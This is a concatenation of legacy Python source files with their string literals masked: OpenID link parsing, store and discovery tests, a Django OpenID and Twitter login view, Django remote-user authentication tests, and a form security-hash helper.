( html ) : <EOL> """<STR_LIT>""" <EOL> stripped = removed_re . sub ( '<STR_LIT>' , html ) <EOL> html_mo = html_find . search ( stripped ) <EOL> if html_mo is None or html_mo . start ( '<STR_LIT>' ) == - <NUM_LIT:1> : <EOL> return [ ] <EOL> start , end = html_mo . span ( '<STR_LIT>' ) <EOL> head_mo = head_find . search ( stripped , start , end ) <EOL> if head_mo is None or head_mo . start ( '<STR_LIT>' ) == - <NUM_LIT:1> : <EOL> return [ ] <EOL> start , end = head_mo . span ( '<STR_LIT>' ) <EOL> link_mos = link_find . finditer ( stripped , head_mo . start ( ) , head_mo . end ( ) ) <EOL> matches = [ ] <EOL> for link_mo in link_mos : <EOL> start = link_mo . start ( ) + <NUM_LIT:5> <EOL> link_attrs = { } <EOL> for attr_mo in attr_find . 
finditer ( stripped , start ) : <EOL> if attr_mo . lastgroup == '<STR_LIT>' : <EOL> break <EOL> attr_name , q_val , unq_val = attr_mo . group ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> attr_val = ent_replace . sub ( replaceEnt , unq_val or q_val ) <EOL> link_attrs [ attr_name ] = attr_val <EOL> matches . append ( link_attrs ) <EOL> return matches <EOL> def relMatches ( rel_attr , target_rel ) : <EOL> """<STR_LIT>""" <EOL> rels = rel_attr . strip ( ) . split ( ) <EOL> for rel in rels : <EOL> rel = rel . lower ( ) <EOL> if rel == target_rel : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def linkHasRel ( link_attrs , target_rel ) : <EOL> """<STR_LIT>""" <EOL> rel_attr = link_attrs . get ( '<STR_LIT>' ) <EOL> return rel_attr and relMatches ( rel_attr , target_rel ) <EOL> def findLinksRel ( link_attrs_list , target_rel ) : <EOL> """<STR_LIT>""" <EOL> matchesTarget = lambda attrs : linkHasRel ( attrs , target_rel ) <EOL> return filter ( matchesTarget , link_attrs_list ) <EOL> def findFirstHref ( link_attrs_list , target_rel ) : <EOL> """<STR_LIT>""" <EOL> matches = findLinksRel ( link_attrs_list , target_rel ) <EOL> if not matches : <EOL> return None <EOL> first = matches [ <NUM_LIT:0> ] <EOL> return first . get ( '<STR_LIT>' ) </s>
<s> from openid . association import Association <EOL> from openid . cryptutil import randomString <EOL> from openid . store . nonce import mkNonce , split <EOL> import unittest <EOL> import string <EOL> import time <EOL> import socket <EOL> import random <EOL> import os <EOL> db_host = '<STR_LIT>' <EOL> allowed_handle = [ ] <EOL> for c in string . printable : <EOL> if c not in string . whitespace : <EOL> allowed_handle . append ( c ) <EOL> allowed_handle = '<STR_LIT>' . join ( allowed_handle ) <EOL> def generateHandle ( n ) : <EOL> return randomString ( n , allowed_handle ) <EOL> generateSecret = randomString <EOL> def getTmpDbName ( ) : <EOL> hostname = socket . gethostname ( ) <EOL> hostname = hostname . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> hostname = hostname . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> return "<STR_LIT>" % ( hostname , os . getpid ( ) , random . randrange ( <NUM_LIT:1> , int ( time . time ( ) ) ) ) <EOL> def testStore ( store ) : <EOL> """<STR_LIT>""" <EOL> now = int ( time . time ( ) ) <EOL> server_url = '<STR_LIT>' <EOL> def genAssoc ( issued , lifetime = <NUM_LIT> ) : <EOL> sec = generateSecret ( <NUM_LIT:20> ) <EOL> hdl = generateHandle ( <NUM_LIT> ) <EOL> return Association ( hdl , sec , now + issued , lifetime , '<STR_LIT>' ) <EOL> def checkRetrieve ( url , handle = None , expected = None ) : <EOL> retrieved_assoc = store . getAssociation ( url , handle ) <EOL> assert retrieved_assoc == expected , ( retrieved_assoc , expected ) <EOL> if expected is not None : <EOL> if retrieved_assoc is expected : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert retrieved_assoc . handle == expected . handle <EOL> assert retrieved_assoc . secret == expected . secret <EOL> def checkRemove ( url , handle , expected ) : <EOL> present = store . removeAssociation ( url , handle ) <EOL> assert bool ( expected ) == bool ( present ) <EOL> assoc = genAssoc ( issued = <NUM_LIT:0> ) <EOL> checkRetrieve ( server_url ) <EOL> store . 
storeAssociation ( server_url , assoc ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> store . storeAssociation ( server_url , assoc ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> checkRemove ( server_url , assoc . handle + '<STR_LIT:x>' , False ) <EOL> checkRemove ( server_url + '<STR_LIT:x>' , assoc . handle , False ) <EOL> checkRemove ( server_url , assoc . handle , True ) <EOL> checkRemove ( server_url , assoc . handle , False ) <EOL> store . storeAssociation ( server_url , assoc ) <EOL> assoc2 = genAssoc ( issued = <NUM_LIT:1> ) <EOL> store . storeAssociation ( server_url , assoc2 ) <EOL> checkRetrieve ( server_url , None , assoc2 ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , assoc2 ) <EOL> assoc3 = genAssoc ( issued = <NUM_LIT:2> , lifetime = <NUM_LIT:100> ) <EOL> store . storeAssociation ( server_url , assoc3 ) <EOL> checkRetrieve ( server_url , None , assoc3 ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , assoc2 ) <EOL> checkRetrieve ( server_url , assoc3 . handle , assoc3 ) <EOL> checkRemove ( server_url , assoc2 . handle , True ) <EOL> checkRetrieve ( server_url , None , assoc3 ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , None ) <EOL> checkRetrieve ( server_url , assoc3 . handle , assoc3 ) <EOL> checkRemove ( server_url , assoc2 . handle , False ) <EOL> checkRemove ( server_url , assoc3 . handle , True ) <EOL> checkRetrieve ( server_url , None , assoc ) <EOL> checkRetrieve ( server_url , assoc . handle , assoc ) <EOL> checkRetrieve ( server_url , assoc2 . handle , None ) <EOL> checkRetrieve ( server_url , assoc3 . handle , None ) <EOL> checkRemove ( server_url , assoc2 . handle , False ) <EOL> checkRemove ( server_url , assoc . handle , True ) <EOL> checkRemove ( server_url , assoc3 . 
handle , False ) <EOL> checkRetrieve ( server_url , None , None ) <EOL> checkRetrieve ( server_url , assoc . handle , None ) <EOL> checkRetrieve ( server_url , assoc2 . handle , None ) <EOL> checkRetrieve ( server_url , assoc3 . handle , None ) <EOL> checkRemove ( server_url , assoc2 . handle , False ) <EOL> checkRemove ( server_url , assoc . handle , False ) <EOL> checkRemove ( server_url , assoc3 . handle , False ) <EOL> assocValid1 = genAssoc ( issued = - <NUM_LIT> , lifetime = <NUM_LIT> ) <EOL> assocValid2 = genAssoc ( issued = - <NUM_LIT:5> ) <EOL> assocExpired1 = genAssoc ( issued = - <NUM_LIT> , lifetime = <NUM_LIT> ) <EOL> assocExpired2 = genAssoc ( issued = - <NUM_LIT> , lifetime = <NUM_LIT> ) <EOL> store . cleanupAssociations ( ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:1>' , assocValid1 ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:1>' , assocExpired1 ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:2>' , assocExpired2 ) <EOL> store . storeAssociation ( server_url + '<STR_LIT:3>' , assocValid2 ) <EOL> cleaned = store . cleanupAssociations ( ) <EOL> assert cleaned == <NUM_LIT:2> , cleaned <EOL> def checkUseNonce ( nonce , expected , server_url , msg = '<STR_LIT>' ) : <EOL> stamp , salt = split ( nonce ) <EOL> actual = store . useNonce ( server_url , stamp , salt ) <EOL> assert bool ( actual ) == bool ( expected ) , "<STR_LIT>" % ( actual , expected , <EOL> msg ) <EOL> for url in [ server_url , '<STR_LIT>' ] : <EOL> nonce1 = mkNonce ( ) <EOL> checkUseNonce ( nonce1 , True , url ) <EOL> checkUseNonce ( nonce1 , False , url ) <EOL> checkUseNonce ( nonce1 , False , url ) <EOL> old_nonce = mkNonce ( <NUM_LIT> ) <EOL> checkUseNonce ( old_nonce , False , url , "<STR_LIT>" % ( old_nonce , ) ) <EOL> old_nonce1 = mkNonce ( now - <NUM_LIT> ) <EOL> old_nonce2 = mkNonce ( now - <NUM_LIT> ) <EOL> recent_nonce = mkNonce ( now - <NUM_LIT> ) <EOL> from openid . store import nonce as nonceModule <EOL> orig_skew = nonceModule . 
SKEW <EOL> try : <EOL> nonceModule . SKEW = <NUM_LIT:0> <EOL> store . cleanupNonces ( ) <EOL> nonceModule . SKEW = <NUM_LIT> <EOL> assert store . useNonce ( server_url , * split ( old_nonce1 ) ) <EOL> assert store . useNonce ( server_url , * split ( old_nonce2 ) ) <EOL> assert store . useNonce ( server_url , * split ( recent_nonce ) ) <EOL> nonceModule . SKEW = <NUM_LIT> <EOL> cleaned = store . cleanupNonces ( ) <EOL> assert cleaned == <NUM_LIT:2> , "<STR_LIT>" % ( cleaned , ) <EOL> nonceModule . SKEW = <NUM_LIT> <EOL> assert store . useNonce ( server_url , * split ( old_nonce1 ) ) <EOL> assert store . useNonce ( server_url , * split ( old_nonce2 ) ) <EOL> assert not store . useNonce ( server_url , * split ( recent_nonce ) ) <EOL> finally : <EOL> nonceModule . SKEW = orig_skew <EOL> def test_filestore ( ) : <EOL> from openid . store import filestore <EOL> import tempfile <EOL> import shutil <EOL> try : <EOL> temp_dir = tempfile . mkdtemp ( ) <EOL> except AttributeError : <EOL> import os <EOL> temp_dir = os . tmpnam ( ) <EOL> os . mkdir ( temp_dir ) <EOL> store = filestore . FileOpenIDStore ( temp_dir ) <EOL> try : <EOL> testStore ( store ) <EOL> store . cleanup ( ) <EOL> except : <EOL> raise <EOL> else : <EOL> shutil . rmtree ( temp_dir ) <EOL> def test_sqlite ( ) : <EOL> from openid . store import sqlstore <EOL> try : <EOL> from pysqlite2 import dbapi2 as sqlite <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> conn = sqlite . connect ( '<STR_LIT>' ) <EOL> store = sqlstore . SQLiteStore ( conn ) <EOL> store . createTables ( ) <EOL> testStore ( store ) <EOL> def test_mysql ( ) : <EOL> from openid . store import sqlstore <EOL> try : <EOL> import MySQLdb <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> db_user = '<STR_LIT>' <EOL> db_passwd = '<STR_LIT>' <EOL> db_name = getTmpDbName ( ) <EOL> from MySQLdb . constants import ER <EOL> conn = MySQLdb . connect ( user = db_user , passwd = db_passwd , host = db_host ) <EOL> conn . 
query ( '<STR_LIT>' % db_name ) <EOL> try : <EOL> conn . query ( '<STR_LIT>' % db_name ) <EOL> store = sqlstore . MySQLStore ( conn ) <EOL> store . createTables ( ) <EOL> testStore ( store ) <EOL> finally : <EOL> conn . query ( '<STR_LIT>' % db_name ) <EOL> def test_postgresql ( ) : <EOL> """<STR_LIT>""" <EOL> from openid . store import sqlstore <EOL> try : <EOL> import psycopg <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> db_name = getTmpDbName ( ) <EOL> db_user = '<STR_LIT>' <EOL> conn_create = psycopg . connect ( database = '<STR_LIT>' , user = db_user , <EOL> host = db_host ) <EOL> conn_create . autocommit ( ) <EOL> cursor = conn_create . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' % ( db_name , ) ) <EOL> conn_create . close ( ) <EOL> conn_test = psycopg . connect ( database = db_name , user = db_user , <EOL> host = db_host ) <EOL> store = sqlstore . PostgreSQLStore ( conn_test ) <EOL> store . createTables ( ) <EOL> testStore ( store ) <EOL> conn_test . close ( ) <EOL> import time <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> conn_remove = psycopg . connect ( database = '<STR_LIT>' , user = db_user , <EOL> host = db_host ) <EOL> conn_remove . autocommit ( ) <EOL> cursor = conn_remove . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' % ( db_name , ) ) <EOL> conn_remove . close ( ) <EOL> def test_memstore ( ) : <EOL> from openid . store import memstore <EOL> testStore ( memstore . MemoryStore ( ) ) <EOL> test_functions = [ <EOL> test_filestore , <EOL> test_sqlite , <EOL> test_mysql , <EOL> test_postgresql , <EOL> test_memstore , <EOL> ] <EOL> def pyUnitTests ( ) : <EOL> tests = map ( unittest . FunctionTestCase , test_functions ) <EOL> load = unittest . defaultTestLoader . loadTestsFromTestCase <EOL> return unittest . TestSuite ( tests ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> suite = pyUnitTests ( ) <EOL> runner = unittest . TextTestRunner ( ) <EOL> result = runner . run ( suite ) <EOL> if result . 
wasSuccessful ( ) : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import urlparse <EOL> import re <EOL> import types <EOL> from openid . yadis . discover import discover , DiscoveryFailure <EOL> from openid import fetchers <EOL> import discoverdata <EOL> status_header_re = re . compile ( r'<STR_LIT>' , re . MULTILINE ) <EOL> four04_pat = """<STR_LIT>""" <EOL> class QuitServer ( Exception ) : pass <EOL> def mkResponse ( data ) : <EOL> status_mo = status_header_re . match ( data ) <EOL> headers_str , body = data . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> headers = { } <EOL> for line in headers_str . split ( '<STR_LIT:\n>' ) : <EOL> k , v = line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> k = k . strip ( ) . lower ( ) <EOL> v = v . strip ( ) <EOL> headers [ k ] = v <EOL> status = int ( status_mo . group ( <NUM_LIT:1> ) ) <EOL> return fetchers . HTTPResponse ( status = status , <EOL> headers = headers , <EOL> body = body ) <EOL> class TestFetcher ( object ) : <EOL> def __init__ ( self , base_url ) : <EOL> self . base_url = base_url <EOL> def fetch ( self , url , headers , body ) : <EOL> current_url = url <EOL> while True : <EOL> parsed = urlparse . urlparse ( current_url ) <EOL> path = parsed [ <NUM_LIT:2> ] [ <NUM_LIT:1> : ] <EOL> try : <EOL> data = discoverdata . generateSample ( path , self . base_url ) <EOL> except KeyError : <EOL> return fetchers . HTTPResponse ( status = <NUM_LIT> , <EOL> final_url = current_url , <EOL> headers = { } , <EOL> body = '<STR_LIT>' ) <EOL> response = mkResponse ( data ) <EOL> if response . status in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> current_url = response . headers [ '<STR_LIT:location>' ] <EOL> else : <EOL> response . final_url = current_url <EOL> return response <EOL> class TestSecondGet ( unittest . TestCase ) : <EOL> class MockFetcher ( object ) : <EOL> def __init__ ( self ) : <EOL> self . count = <NUM_LIT:0> <EOL> def fetch ( self , uri , headers = None , body = None ) : <EOL> self . count += <NUM_LIT:1> <EOL> if self . 
count == <NUM_LIT:1> : <EOL> headers = { <EOL> '<STR_LIT>' . lower ( ) : '<STR_LIT>' , <EOL> } <EOL> return fetchers . HTTPResponse ( uri , <NUM_LIT:200> , headers , '<STR_LIT>' ) <EOL> else : <EOL> return fetchers . HTTPResponse ( uri , <NUM_LIT> ) <EOL> def setUp ( self ) : <EOL> self . oldfetcher = fetchers . getDefaultFetcher ( ) <EOL> fetchers . setDefaultFetcher ( self . MockFetcher ( ) ) <EOL> def tearDown ( self ) : <EOL> fetchers . setDefaultFetcher ( self . oldfetcher ) <EOL> def test_404 ( self ) : <EOL> uri = "<STR_LIT>" <EOL> self . failUnlessRaises ( DiscoveryFailure , discover , uri ) <EOL> class _TestCase ( unittest . TestCase ) : <EOL> base_url = '<STR_LIT>' <EOL> def __init__ ( self , input_name , id_name , result_name , success ) : <EOL> self . input_name = input_name <EOL> self . id_name = id_name <EOL> self . result_name = result_name <EOL> self . success = success <EOL> unittest . TestCase . __init__ ( self , methodName = '<STR_LIT>' ) <EOL> def setUp ( self ) : <EOL> fetchers . setDefaultFetcher ( TestFetcher ( self . base_url ) , <EOL> wrap_exceptions = False ) <EOL> self . input_url , self . expected = discoverdata . generateResult ( <EOL> self . base_url , <EOL> self . input_name , <EOL> self . id_name , <EOL> self . result_name , <EOL> self . success ) <EOL> def tearDown ( self ) : <EOL> fetchers . setDefaultFetcher ( None ) <EOL> def runCustomTest ( self ) : <EOL> if self . expected is DiscoveryFailure : <EOL> self . failUnlessRaises ( DiscoveryFailure , <EOL> discover , self . input_url ) <EOL> else : <EOL> result = discover ( self . input_url ) <EOL> self . failUnlessEqual ( self . input_url , result . request_uri ) <EOL> msg = '<STR_LIT>' % ( <EOL> result . normalized_uri , self . expected . normalized_uri ) <EOL> self . failUnlessEqual ( <EOL> self . expected . normalized_uri , result . normalized_uri , msg ) <EOL> msg = '<STR_LIT>' % ( <EOL> result . response_text , self . expected . response_text ) <EOL> self . 
failUnlessEqual ( <EOL> self . expected . response_text , result . response_text , msg ) <EOL> expected_keys = dir ( self . expected ) <EOL> expected_keys . sort ( ) <EOL> actual_keys = dir ( result ) <EOL> actual_keys . sort ( ) <EOL> self . failUnlessEqual ( actual_keys , expected_keys ) <EOL> for k in dir ( self . expected ) : <EOL> if k . startswith ( '<STR_LIT>' ) and k . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> exp_v = getattr ( self . expected , k ) <EOL> if isinstance ( exp_v , types . MethodType ) : <EOL> continue <EOL> act_v = getattr ( result , k ) <EOL> assert act_v == exp_v , ( k , exp_v , act_v ) <EOL> def shortDescription ( self ) : <EOL> try : <EOL> n = self . input_url <EOL> except AttributeError : <EOL> n = self . input_name <EOL> return "<STR_LIT>" % ( <EOL> n , <EOL> self . __class__ . __module__ ) <EOL> def pyUnitTests ( ) : <EOL> s = unittest . TestSuite ( ) <EOL> for success , input_name , id_name , result_name in discoverdata . testlist : <EOL> test = _TestCase ( input_name , id_name , result_name , success ) <EOL> s . addTest ( test ) <EOL> return s <EOL> def test ( ) : <EOL> runner = unittest . TextTestRunner ( ) <EOL> return runner . run ( loadTests ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) </s>
<s> import logging <EOL> import openidgae <EOL> from django import http <EOL> from django import template <EOL> from django . template import loader <EOL> from django . conf import settings <EOL> from django . core import urlresolvers <EOL> from openid . consumer . consumer import Consumer <EOL> from openid . consumer import discover <EOL> from openidgae import store <EOL> from common import api <EOL> from common import memcache <EOL> from common import twitter <EOL> from common import user <EOL> from common import util <EOL> from poboxopenid import util as util_externals <EOL> import facebook . djangofb as facebook <EOL> def openid_google ( request ) : <EOL> openid = '<STR_LIT>' <EOL> return openid_login ( request , openid ) <EOL> def openid_login ( request , openid = '<STR_LIT>' ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> openid = openid . strip ( ) <EOL> if not openid : <EOL> message = '<STR_LIT>' <EOL> c = Consumer ( { } , store . DatastoreStore ( ) ) <EOL> try : <EOL> auth_request = c . begin ( openid ) <EOL> except discover . DiscoveryFailure , e : <EOL> logging . error ( '<STR_LIT>' <EOL> % ( openid , str ( e ) ) ) <EOL> message = '<STR_LIT>' <EOL> from openid . extensions import sreg <EOL> sreg_request = sreg . SRegRequest ( <EOL> optional = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> auth_request . addExtension ( sreg_request ) <EOL> from openid . extensions import ax <EOL> ax_req = ax . FetchRequest ( ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT:email>' , required = True ) ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> ax_req . add ( ax . AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> ax_req . add ( ax . 
AttrInfo ( '<STR_LIT>' , <EOL> alias = '<STR_LIT>' , required = True ) ) <EOL> auth_request . addExtension ( ax_req ) <EOL> import urlparse <EOL> parts = list ( urlparse . urlparse ( util_externals . get_full_path ( request ) ) ) <EOL> parts [ <NUM_LIT:2> ] = urlresolvers . reverse ( '<STR_LIT>' ) [ <NUM_LIT:1> : ] <EOL> continueUrl = util_externals . get_continue_url ( request , '<STR_LIT>' ) <EOL> import urllib <EOL> parts [ <NUM_LIT:4> ] = '<STR_LIT>' % urllib . quote_plus ( continueUrl ) <EOL> parts [ <NUM_LIT:5> ] = '<STR_LIT>' <EOL> return_to = urlparse . urlunparse ( parts ) <EOL> realm = urlparse . urlunparse ( parts [ <NUM_LIT:0> : <NUM_LIT:2> ] + [ '<STR_LIT>' ] * <NUM_LIT:4> ) <EOL> response = http . HttpResponse ( ) <EOL> session = openidgae . get_session ( request , response ) <EOL> import pickle <EOL> session . openid_stuff = pickle . dumps ( c . session ) <EOL> session . put ( ) <EOL> redirect_url = auth_request . redirectURL ( realm , return_to ) <EOL> response . write ( <EOL> "<STR_LIT>" <EOL> % ( redirect_url , ) ) <EOL> return response <EOL> def openid_createuser ( request ) : <EOL> person = openidgae . get_current_person ( request , http . HttpResponse ( ) ) <EOL> email = person . get_email ( ) <EOL> res = util_externals . reponse_if_exists ( email ) <EOL> if res is not None : <EOL> return res <EOL> nick = util_externals . get_nick_from_email ( email ) <EOL> params = { <EOL> '<STR_LIT>' : nick , <EOL> '<STR_LIT:password>' : util . generate_password ( ) , <EOL> '<STR_LIT>' : person . get_field_value ( '<STR_LIT>' , '<STR_LIT:none>' ) , <EOL> '<STR_LIT>' : person . get_field_value ( '<STR_LIT>' , '<STR_LIT:none>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:email>' : email , <EOL> } <EOL> actor_ref = util_externals . user_create ( '<STR_LIT>' , params , util . display_nick ( email ) , email ) <EOL> response = util . RedirectFlash ( '<STR_LIT:/>' , '<STR_LIT>' % util . get_metadata ( '<STR_LIT>' ) ) <EOL> user . 
set_user_cookie ( response , actor_ref ) <EOL> return response <EOL> def twitter_user_create ( request ) : <EOL> twitter_user , token = util_externals . twitter_user ( ) <EOL> if not twitter_user : <EOL> c = template . RequestContext ( request , locals ( ) ) <EOL> t = loader . get_template ( '<STR_LIT>' ) <EOL> return http . HttpResponse ( t . render ( c ) ) <EOL> res = util_externals . reponse_if_exists ( twitter_user . id , '<STR_LIT>' ) <EOL> if res is not None : <EOL> return res <EOL> nick = util_externals . get_nick_from_email ( twitter_user . screen_name ) <EOL> params = { <EOL> '<STR_LIT>' : nick , <EOL> '<STR_LIT:password>' : util . generate_password ( ) , <EOL> '<STR_LIT>' : twitter_user . name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:email>' : None , <EOL> } <EOL> actor_ref = util_externals . user_create ( '<STR_LIT>' , <EOL> params , <EOL> twitter_user . screen_name , <EOL> str ( twitter_user . id ) , <EOL> '<STR_LIT>' % twitter_user . screen_name ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> actor_ref . extra [ '<STR_LIT>' ] = token <EOL> actor_ref . put ( ) <EOL> response = util . RedirectFlash ( '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> user . set_user_cookie ( response , actor_ref ) <EOL> return response </s>
<s> from django . conf . urls . defaults import * <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ) </s>
<s> from datetime import datetime <EOL> from django . conf import settings <EOL> from django . contrib . auth . backends import RemoteUserBackend <EOL> from django . contrib . auth . models import AnonymousUser , User <EOL> from django . test import TestCase <EOL> class RemoteUserTest ( TestCase ) : <EOL> urls = '<STR_LIT>' <EOL> middleware = '<STR_LIT>' <EOL> backend = '<STR_LIT>' <EOL> known_user = '<STR_LIT>' <EOL> known_user2 = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . curr_middleware = settings . MIDDLEWARE_CLASSES <EOL> self . curr_auth = settings . AUTHENTICATION_BACKENDS <EOL> settings . MIDDLEWARE_CLASSES += ( self . middleware , ) <EOL> settings . AUTHENTICATION_BACKENDS = ( self . backend , ) <EOL> def test_no_remote_user ( self ) : <EOL> """<STR_LIT>""" <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = None ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> def test_unknown_user ( self ) : <EOL> """<STR_LIT>""" <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users + <NUM_LIT:1> ) <EOL> User . objects . get ( username = '<STR_LIT>' ) <EOL> response = self . client . 
get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users + <NUM_LIT:1> ) <EOL> def test_known_user ( self ) : <EOL> """<STR_LIT>""" <EOL> User . objects . create ( username = '<STR_LIT>' ) <EOL> User . objects . create ( username = '<STR_LIT>' ) <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user2 ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> def test_last_login ( self ) : <EOL> """<STR_LIT>""" <EOL> user = User . objects . create ( username = '<STR_LIT>' ) <EOL> default_login = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> user . last_login = default_login <EOL> user . save ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user ) <EOL> self . assertNotEqual ( default_login , response . context [ '<STR_LIT:user>' ] . last_login ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> user . last_login = default_login <EOL> user . save ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = self . known_user ) <EOL> self . assertEqual ( default_login , response . context [ '<STR_LIT:user>' ] . last_login ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MIDDLEWARE_CLASSES = self . curr_middleware <EOL> settings . AUTHENTICATION_BACKENDS = self . 
curr_auth <EOL> class RemoteUserNoCreateBackend ( RemoteUserBackend ) : <EOL> """<STR_LIT>""" <EOL> create_unknown_user = False <EOL> class RemoteUserNoCreateTest ( RemoteUserTest ) : <EOL> """<STR_LIT>""" <EOL> backend = '<STR_LIT>' <EOL> def test_unknown_user ( self ) : <EOL> num_users = User . objects . count ( ) <EOL> response = self . client . get ( '<STR_LIT>' , REMOTE_USER = '<STR_LIT>' ) <EOL> self . assert_ ( isinstance ( response . context [ '<STR_LIT:user>' ] , AnonymousUser ) ) <EOL> self . assertEqual ( User . objects . count ( ) , num_users ) <EOL> class CustomRemoteUserBackend ( RemoteUserBackend ) : <EOL> """<STR_LIT>""" <EOL> def clean_username ( self , username ) : <EOL> """<STR_LIT>""" <EOL> return username . split ( '<STR_LIT:@>' ) [ <NUM_LIT:0> ] <EOL> def configure_user ( self , user ) : <EOL> """<STR_LIT>""" <EOL> user . email = '<STR_LIT>' <EOL> user . save ( ) <EOL> return user <EOL> class RemoteUserCustomTest ( RemoteUserTest ) : <EOL> """<STR_LIT>""" <EOL> backend = '<STR_LIT>' <EOL> known_user = '<STR_LIT>' <EOL> known_user2 = '<STR_LIT>' <EOL> def test_known_user ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RemoteUserCustomTest , self ) . test_known_user ( ) <EOL> self . assertEqual ( User . objects . get ( username = '<STR_LIT>' ) . email , '<STR_LIT>' ) <EOL> self . assertEqual ( User . objects . get ( username = '<STR_LIT>' ) . email , '<STR_LIT>' ) <EOL> def test_unknown_user ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RemoteUserCustomTest , self ) . test_unknown_user ( ) <EOL> newuser = User . objects . get ( username = '<STR_LIT>' ) <EOL> self . assertEqual ( newuser . email , '<STR_LIT>' ) </s>
<s> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from django . conf import settings <EOL> from django . utils . hashcompat import md5_constructor <EOL> from django . forms import BooleanField <EOL> def security_hash ( request , form , * args ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> data . extend ( args ) <EOL> data . append ( settings . SECRET_KEY ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> return md5_constructor ( pickled ) . hexdigest ( ) </s>
